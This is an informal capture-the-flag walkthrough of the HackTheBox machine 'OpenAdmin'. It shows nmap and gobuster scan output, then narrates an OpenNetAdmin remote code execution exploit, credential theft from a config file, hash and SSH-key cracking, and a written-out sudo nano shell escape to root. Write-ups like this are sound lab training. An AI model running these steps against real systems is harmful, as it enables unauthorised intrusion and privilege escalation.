We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Wed Jul 14 08:01:37 2021 as: nmap -sC -sV -oA nmap 10.10.10.171 Nmap scan report for 10.10.10.171 Host is up (0.40s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jul 14 08:02:55 2021 -- 1 IP address (1 host up) scanned in 78.33 seconds
Linux my food lol so we are working on OpenAdmin On HackTheBox we always kick off with Nmap scan now that we have our result let start enumerating seems we have 2 open ports.
Ok that a default apache page now let hit
gobuster to find some hidden directory.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.171] └─$ gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.171 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: bak,sh,pl,cgi,zip,txt,php,html [+] Timeout: 10s =============================================================== 2021/07/14 10:24:24 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 10918] /music (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
Music directory cool let navigate to it.
Going through the pages clicking on
login land me on a new page.
Seems it running
OpenNetAdmin v18.1.1 let do a quick google search maybe it vulnerable.
Remote Code Execution exploit let try it.
We have shell cool.
Some users on the home directory but have no permission seems we need to move our privilege. Going through directories
/var/www/ona/local/config i was able to get a credentials in a config file.
Now let SSH with user
jimmy with the password.
We are in i always love checking what ports we have ruuning locally with
netstat -tulpn .
SSH Port Forwarding
ssh -L 52846:localhost:52846 firstname.lastname@example.org
Now let access it on our browser.
Seems we need a credentials i try using
Jimmy creds but no luck now back to enumerate more.
Username and a hash let try cracking it using online tools.
Now let log in.
Boom we have
joanna SSH private key. Let crack it and hit SSH.
Now let SSH into the machine with the Private Key and the password we got from it.
We are in and can run sudo on
/bin/nano /opt/priv .
sudo /bin/nano /opt/priv ^R^X reset; sh 1>&0 2>&0
We are root and Done.
Greeting From Muzec